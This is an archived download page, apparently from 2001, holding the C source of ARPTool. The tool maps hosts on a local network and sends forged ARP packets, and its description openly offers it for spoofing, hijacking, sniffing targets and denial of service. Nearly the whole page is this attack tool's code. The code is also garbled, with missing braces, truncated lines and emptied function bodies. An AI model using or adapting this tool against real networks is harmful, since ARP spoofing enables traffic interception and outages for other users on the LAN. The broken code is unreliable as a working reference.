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Posted Dec 6, 2001
Authored by Cristiano Lincoln Mattos

ARPtool has basically two functions: 1) it maps all the ip's on the same ethernet cable segment/LAN as the machine it runs on, which is useful to determine the hosts that could be victim of sniffing, hijacking, etc. 2) a general ARP generator function, for sending customized ARP packets, which can be used for spoofing hosts, DoS, etc.

tags | exploit, spoof
SHA-256 | 80922942c238437cc8f4b15ffaf546bf7e6e417f66f73374829a03c4d25b767d


Change Mirror Download
* ARPTool v0.1, (c) Cristiano Lincoln Mattos, 1999 - <lincoln@hotlink.com.br>
* - Compiled and tested on Linux 2.0.33, 2.0.35, 2.0.36, libc5 & glibc.
* Will port to Solaris 2.5.1 as soon as i have time.
* - For usage, run it without arguments.
* - If you dont know what this is for, or what you can do with it,
* read yuri volobuev's excellent bugtraq post about ARP spoofing
* (available from the bugtraq archives).
* - The netmap results depend on the network latency.. try adjusting the
* usleep() delay, if you think it's too small/big.
* - The latest version will be always at
* http://www.hotlink.com.br/users/lincoln/arptool
* - Some code borrowed from neped (apostols.org), thanks.
* #include <stddisclaimer.h>
* 09/12/98 - General code cleanup.
* 07/12/98 - Removed the option for hiding in the process list, and
* double mode: didn't work as expected, stupid oversight.
* 29/12/98 - Better display of MAC's with more than one IP (proxy
* arp or virtual interfaces).
* 28/12/98 - Added check for arp reply being to source ip (netmap).
* 12/06/01 - Alan Bishoff fixed some minor compilation issues. Changed
* linux/if.h to net/if.h and fixed wrapped lines.

#include <stdio.h>
#include <stdlib.h>
/* #include <linux/if.h> */
#include <net/if.h>
#include <linux/sockios.h>
#include <linux/in.h>
#include <linux/if_ether.h>
#include <unistd.h>
#include <fcntl.h>

#define ARP_ETHER 1
#define ARP_REQUEST 1
#define ARP_REPLY 2

/* Structures */
struct pkt_struct {
unsigned char eth_dst[6];
unsigned char eth_src[6];
unsigned short eth_proto;
unsigned short int arp_hw_type;
unsigned short int arp_proto;
unsigned char arp_hw_len;
unsigned char arp_proto_len; // proto is IP.
unsigned short arp_oper;
unsigned char arp_hw_src[6];
unsigned char arp_ip_src[4];
unsigned char arp_hw_dst[6];
unsigned char arp_ip_dst[4];

struct spoof_struct {
unsigned char hw_src[6];
unsigned char hw_dst[6];
unsigned long int ip_src;
unsigned long int ip_dst;
unsigned short op;

/* List structures */
struct iplist_struct {
unsigned long int ip;
struct iplist_struct * next;

struct list_struct {
unsigned char hw[ETH_ALEN];
struct iplist_struct * iplist;
struct iplist_struct * lastip;
struct list_struct * next;
} * head = NULL, * tail = NULL;

/* Functions */
char * hwaddr_to_str (unsigned char * str);
unsigned char * str_to_hwaddr (char * str);
unsigned int hexstr_to_int (char *cptr);
void netmap (int fd, unsigned long int start_ip);
void usage (char * av, int mode);
void add_to_list (unsigned long int ip, unsigned char * hw);
void show_list ();

/* Global variables */
unsigned long netmask, broadcast; /* struct in_addr */
unsigned char hwaddr[ETH_ALEN];
struct sockaddr sock;
int verbose = 0;

void sendarp (int fd, unsigned char * h_source, unsigned char * h_dest, \
unsigned char * arp_src, unsigned char * arp_dst, \
unsigned long int ip_source, unsigned long int ip_dest, unsigned char
op) {
struct pkt_struct pkt;

// Ethernet header.
pkt.eth_proto = htons(ETH_P_ARP);
// ARP header.
pkt.arp_hw_type = htons(ARP_ETHER);
pkt.arp_proto = htons(ETH_P_IP);
pkt.arp_hw_len = ETH_ALEN;
pkt.arp_proto_len = 4;
pkt.arp_oper = htons(op);

if (arp_src==0) bzero(&pkt.arp_hw_src,ETH_ALEN);
else memcpy(&pkt.arp_hw_src,arp_src,ETH_ALEN);
if (arp_dst==0) bzero(&pkt.arp_hw_dst,ETH_ALEN);
else memcpy(&pkt.arp_hw_dst,arp_dst,ETH_ALEN);


if ( (sendto(fd,&pkt,sizeof(pkt),0,&sock,sizeof(sock))) < 0) perror("Error sending

if (verbose) {
char ips[16], hws[18];
printf(" - Sending packet: Ether src: %s - Ether dst: %s \n",hws,hwaddr_to_str(pkt.eth_dst));
printf(" ARP hw src: %s - ARP hw dst: %s\n",hws,hwaddr_to_str(pkt.arp_hw_dst));
printf(" ARP ip src: %s - ARP ip dst: %s - ARP op: ",ips,inet_ntoa(ip_dest));
if (op==1) printf("%s\n","Request");
else printf("%s\n","Reply");


void netmap (int fd, unsigned long int start_ip) {
unsigned long int ip, ip_s;
struct pkt_struct * pkt;
int i;

ip_s = start_ip;
ip = ip_s & netmask;

i = fcntl(fd,F_GETFL);
if ((fcntl(fd,F_SETFL, i | O_NONBLOCK))<0) {
perror("FCNTL"); exit (1);

pkt = (struct pkt_struct *) malloc(sizeof(struct pkt_struct));
bzero(pkt,sizeof(struct pkt_struct));

printf(" - Mapping network... \n");
while (ip < broadcast) {
unsigned long int iptmp;
unsigned char hwa[ETH_ALEN];
ip = ntohl(ip);
ip = htonl(++ip);


i = sizeof(sock);
bzero(pkt,sizeof(struct pkt_struct));
if ((recvfrom(fd,pkt,sizeof(struct pkt_struct),0,&sock,&i)) < 0) continue;

if ((iptmp!=ip_s) || (ntohs(pkt->arp_oper)!=ARP_REPLY)) continue;

free (pkt);

void main (int argc, char ** argv) {
struct ifreq ifr;
struct sockaddr_in sin;
struct spoof_struct sp;
unsigned long int ip;
int fd, ret;
int i = 0, map = 0, spoof = 0, interval = 0;
char * dev;

// Parsing the arguments.
if (argc < 2) { usage(argv[0],0); exit(1); }

dev = (char *) malloc(6); strncpy(dev,"eth0",5);
while ((i = getopt(argc, argv, "dc:vmi:s:")) != EOF) {
switch (i) {
case 'm': map = 1; continue;
case 'v': verbose = 1; continue;
case 'i': dev = optarg; continue;
case 'c': interval = atoi(optarg); continue;
case 's': spoof = optind-1; continue;
case '?': exit(1);
default: usage(argv[0],0); exit;
if ((map) && (spoof)) {
printf(" Error: cannot run in map mode (-m) and spoof mode (-s) simultaneously.\n");
if ((!map) && (!spoof)) {
printf(" Error: map mode (-m) or spoof mode (-s) must be specified.\n");
if (spoof) {
unsigned long int ips;
int origspoof = spoof;

spoof = optind;
if ((!argv[origspoof]) || (!argv[spoof]) || (!argv[spoof+1]) || (!argv[spoof+2]) || (!argv[spoof+3])) {
printf(" Error: spoof (-s) requires five arguments: \n");

ips = atoi(argv[spoof+3]);
if ( (ips!=1) && (ips!=2) ) {
printf(" Erro: wrong arp operation. Must be 1 for request or 2 for reply. \n");
ips= inet_addr(argv[spoof++]);
ips = inet_addr(argv[spoof++]);
ips = atoi(argv[spoof]);

// Setting up the sockets, interface, and getting data.
sock.sa_family = AF_INET;
fd = socket(AF_INET, SOCK_PACKET, htons(ETH_P_ARP));
if (fd==-1) {
perror("Socket: "); exit (1);

// HW Addr.
ret = ioctl(fd,SIOCGIFHWADDR,&ifr);
if (ret==-1) {
perror("Error getting HW Address"); exit (1);

// IP.
ret = ioctl(fd,SIOCGIFADDR,&ifr);
if (ret==-1) {
perror("Error getting IP Address"); exit (1);
memcpy(&sin,&ifr.ifr_addr,sizeof(struct sockaddr_in));
ip = sin.sin_addr.s_addr;

// Netmask.
ret = ioctl(fd,SIOCGIFNETMASK,&ifr);
if (ret==-1) {
perror("Error getting netmask"); exit (1);
memcpy(&sin,&ifr.ifr_netmask,sizeof(struct sockaddr_in));
netmask = sin.sin_addr.s_addr;
// netmask = 16777215; // 24 bit Netmask

// Broadcast.
ret = ioctl(fd,SIOCGIFBRDADDR,&ifr);
if (ret==-1) {
perror("Error getting broadcast"); exit (1);
memcpy(&sin,&ifr.ifr_broadaddr,sizeof(struct sockaddr_in));
broadcast = sin.sin_addr.s_addr;

printf(" - Hardware addr : %s\n",hwaddr_to_str(hwaddr));
printf(" - Interface IP: %s (%s)\n",inet_ntoa(ip),dev);
printf(" - Netmask: %s\n",inet_ntoa(netmask));
printf(" - Brodcast: %s\n",inet_ntoa(broadcast));

while (1) {
if (map) netmap (fd,ip);
if (spoof) {
if (interval) sleep(interval);
else break;

char * hwaddr_to_str (unsigned char * str) {
static char tmp[20];
return tmp;

unsigned int hexstr_to_int(char *cptr) {
unsigned int i, j = 0;

while (cptr && *cptr && isxdigit(*cptr)) {
i = *cptr++ - '0';
if (9 < i) i -= 7;
j <<= 4;
j |= (i & 0x0f);

unsigned char * str_to_hwaddr (char * str) {
unsigned char tmp[2], strbuf[17], t[2];
static unsigned char * buf, * tt;
int e, i;

buf = (unsigned char *) malloc(6);
bzero(t,2); bzero(tmp,2); bzero(strbuf,17); bzero(buf,6);
strncpy(strbuf,str,17); strbuf[17]='\0';
tt = buf;

e = 0;
for (i=0; i < strlen(strbuf); i++) {
if ((strbuf[i]==':') && (e==0)) continue;
tmp[e] = strbuf[i]; e++;
if (e==2) {
unsigned int a;
a = hexstr_to_int(tmp);
memcpy(tt,&a,1); tt++;
bzero(tmp,2); e = 0;
return buf;

void usage (char * av, int mode) {
printf(" ARPTool v0.1, (c) Cristiano Lincoln Mattos, 1999. <lincoln@hotlink.com.br> \n");
if (!mode) {
printf(" Sintax: %s [-i interface] [-m] [-c] [-s hwsrc hwdest ipsrc ipdst op]\n",av);
printf(" -i interface: use this interface. If ommited, default to eth0\n");
printf(" -m: network map mode. Will identify all hosts on the same \n cable segment. \n");
printf(" -s src_hwaddress dst_hwaddress src_ipaddress dst_ipaddress operation:\n");
printf(" send arbitrary ARP packets. The hardware address must be \n specified in the usual form, i.e. 00:00:FD:FF:1E:C1.\n
Operation is 1 for ARP request, 2 for ARP reply. \n");
printf(" -c interval: continuous mode. Will keep sending the speci
fied \n packets every interval seconds (requires -s or -m).\n");

void show_list () {
struct list_struct * tmp, * tmp2;
tmp = head;
while (tmp!=NULL) {
struct iplist_struct * iptmp;
iptmp = tmp->iplist;
printf(" -- HW Address: %s",hwaddr_to_str(tmp->hw));
if (iptmp->next) printf(" - Several IP's: probably router with proxy arp, or virtual interfaces.\n");
while (iptmp!=NULL) {
printf(" IP: %s\n",inet_ntoa(iptmp->ip));
iptmp = iptmp->next;
free(iptmp); tmp2 = tmp->next;
free(tmp); tmp = tmp2;

void add_to_list (unsigned long int ip, unsigned char * hw) {
struct list_struct * tmp;
struct iplist_struct * iptmp;
tmp = head;
while (tmp) {
if ((hw[0]==tmp->hw[0]) && (hw[1]==tmp->hw[1]) && (hw[2]==tmp->hw[2]) && (hw[3]==tmp->hw[3]) &&\
(hw[4]==tmp->hw[4]) && (hw[5]==tmp->hw[5])) break;
tmp = tmp->next;
if (!tmp) { // If it's the first HW entry, or did not find HW in list, create
if ((tmp = (struct list_struct *) malloc(sizeof(struct list_struct))) == NULL) {
printf("\n malloc error. \n"); exit (1);
if ((iptmp = (struct iplist_struct *) malloc(sizeof(struct iplist_struct)))
== NULL) {
printf("\n malloc error. \n"); exit (1);
iptmp->ip = ip;
iptmp->next = NULL;
tmp->iplist = iptmp;
tmp->lastip = iptmp;
tmp->next = NULL;
if (tail) {
tail->next = tmp;
tail = tmp;
} else { // Found the HW entry in the list, just add the IP.
if ((iptmp = (struct iplist_struct *) malloc(sizeof(struct iplist_struct)))
== NULL) {
printf("\n malloc error. \n"); exit (1);
iptmp->ip = ip;
iptmp->next = NULL;
tmp->lastip->next = iptmp;
tmp->lastip = iptmp;
if (!head) head = tail = tmp;
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